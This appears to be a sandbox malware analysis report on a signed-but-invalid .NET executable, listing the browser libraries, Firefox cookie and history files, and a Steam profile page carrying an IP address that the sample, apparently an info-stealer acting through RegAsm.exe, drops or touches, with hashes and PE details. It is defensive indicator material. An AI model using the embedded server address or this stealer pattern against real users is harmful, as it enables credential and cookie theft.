                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):34657
                                                                                                                                                                                                                                                  Entropy (8bit):5.429980676782271
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:k7pqLtWY2wt5D0gqaAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S2R:k78LtWY2wt5D0gqaAchZ4VWBCW3KI8ix
                                                                                                                                                                                                                                                  MD5:D25D44AB2D13AE88822D45370840E5A2
                                                                                                                                                                                                                                                  SHA1:376A02C2D691E30D4E96ACDE2EE74FAF513B596B
                                                                                                                                                                                                                                                  SHA-256:317411B030272E60C4A2215E8514DA91C2C345EA02F734B2C356EF1370E52CB8
                                                                                                                                                                                                                                                  SHA-512:F03D1E8F7DB92A89C93EC51D69B2C49FCA651E4E7C594B360B252871B732710F23A4F4E01280264CA775304F1423E5B467809A7E78DB84E197A25C78CBDF8B47
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2459136
                                                                                                                                                                                                                                                  Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.465578416124265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:8IXfpi67eLPU9skLmb0b4XWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbI:BXD94XWlLZMM6YFH1+I
                                                                                                                                                                                                                                                  MD5:8D570A923DD96A051D3598FF904E8D13
                                                                                                                                                                                                                                                  SHA1:4E1C7540C459185CDAE1944D7905CF62B8989F57
                                                                                                                                                                                                                                                  SHA-256:22261F2A69885FE97DB1AA51984AB9E0399139AAB255045BCA9CA18B1737BEE5
                                                                                                                                                                                                                                                  SHA-512:68B23112202716A347E7257E6E04FBBACD0E6971589827D8BF78DC0D380E4710FB9B688F7CFD438F813BCECFD743548E8F11357A3E01F200E377C9392791CEA0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c.V................................................................................................................................................................................................................................................................................................................................................x.b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):7.95354171835846
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:file.exe
                                                                                                                                                                                                                                                  File size:244'360 bytes
                                                                                                                                                                                                                                                  MD5:0ce3dc374e49433d7e15d02c015e0ee3
                                                                                                                                                                                                                                                  SHA1:71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
                                                                                                                                                                                                                                                  SHA256:f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
                                                                                                                                                                                                                                                  SHA512:a68b25bd8170205d491f3409393757eda6ec4c2b7f31e985b57a8d5fe9e876264167d2228087c6645ebd6dee6522386f9e39e631e6a7f06783f401432df730fa
                                                                                                                                                                                                                                                  SSDEEP:6144:hABBPmUqO791Ou5dscGTGnbpZfcATrKTJJzM5E:hABBOa90uzVWGlRmTJX
                                                                                                                                                                                                                                                  TLSH:C03412D496545E42CD228EB379F1E7A3F7B363430A61828721CAC8A45FF53928BDD178
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................b............... ........@.. ....................................`................................

                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Entrypoint:0x43800e
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x66068A99 [Fri Mar 29 09:32:09 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                                                  Signature Valid:false
